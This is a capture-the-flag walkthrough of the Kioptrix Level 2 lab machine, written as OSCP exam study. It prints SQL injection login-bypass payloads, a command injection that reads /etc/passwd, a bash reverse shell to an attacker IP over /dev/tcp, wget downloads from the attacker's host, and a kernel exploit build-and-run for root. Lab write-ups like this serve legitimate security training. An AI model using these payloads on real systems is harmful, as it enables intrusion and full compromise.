Kioptrix: Level 2 Walkthrough
This is the second post of a series of posts I’m creating to study for OSCP. You can find the previous post by clicking here.
URL: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Release date: 11 Feb 2011
Author: Kioptrix
Provided description: This Kioptrix VM Image are easy challenges. The objective of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
#Scanning and Enumeration
As always, let’s start with some basic scanning and enumeration:
With Nmap, we scan only the main 1000 ports and their services versions:
nmap -T4 -sV <ipaddress>
It seems we have a web server here, let’s see what its page looks like:
#Exploiting
It is a simple web form, and raises us some flags here, could it be vulnerable to SQL Injection? Let’s try one some of them:
‘ or 1=1 -- -
admin’ — -
And… it works!
You can also automate those payload tries with Burp Suite by sending the request to the “Intruder” tab and passing the payloads as parameters, and the attack as “sniper type”. You can find many payloads to try here.
As you can see on the image above, you can always refer to the length of the request, in this case those with 860 were the payloads that didn’t work, but the others with 779 in length worked! You read it right, at least 6 payloads worked here!
Now that we got access to the tool, we have to find out what it does. It seems that the purpose of this tool is to ping something:
If it is using a bash command, what if I try to add more commands to it? We can ping the server and then cat it out something:
127.0.0.1;cat ../../../etc/passwd
This command will first ping the server itself, finish that command with semicolon (;), and then cat the /etc/passwd file. The 3 ‘../’ in the command is because we are returning 3 paths directly to the / directory:
Yep, we did, why don’t we get a reverse shell then?
On the attacker machine:
nc -lvp 1337
On the browser:
127.0.0.1; bash -i >& /dev/tcp/192.168.15.6/1337 0>&1
The command above is going to deliver a reverse shell on port 1337 on our attacker machine that is already listening to:
We are in! All we have to do now is to escalate our privileges.
#Escalating Privileges
To enumerate the machine and search for an exploit, I’m going to use LinEnum.sh on this one.
To transfer the file to the machine, you can use the python simple http server and retrieve the file with Wget:
Attacker machine:
python3 -m http.server 8000
To download the file to the victim’s machine:
wget http://<attackerIP>:8000/LinEnum.sh /tmp/linenum.sh
Then you navigate to the /tmp folder and apply to the file the permission to be executed:
cd /tmp; chmod +x linenum.sh
With all set, we can finally run it and search for exploits:
In the beginning of the script execution, we found something curious. This is a really old version of Linux Kernel, if we look at exploit DB about it, we can find the following exploit:
This exploit is for the CVE-2009–2698, which has the following description:
The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.
This is a kernel exploit, so we have to compile it on the victim’s machine and then run it to get the root shell:
#Download the file by pulling the file from your attacker machine:
cd /tmp; wget http://<attackerIP>:8000/9542.c
#compile the C file with GCC and then run it:
gcc -o 9542 9542.c && ./9542
And with that, we get the shell:
And that’s it, we rooted this box. If you have any questions, let me know in the comments section.
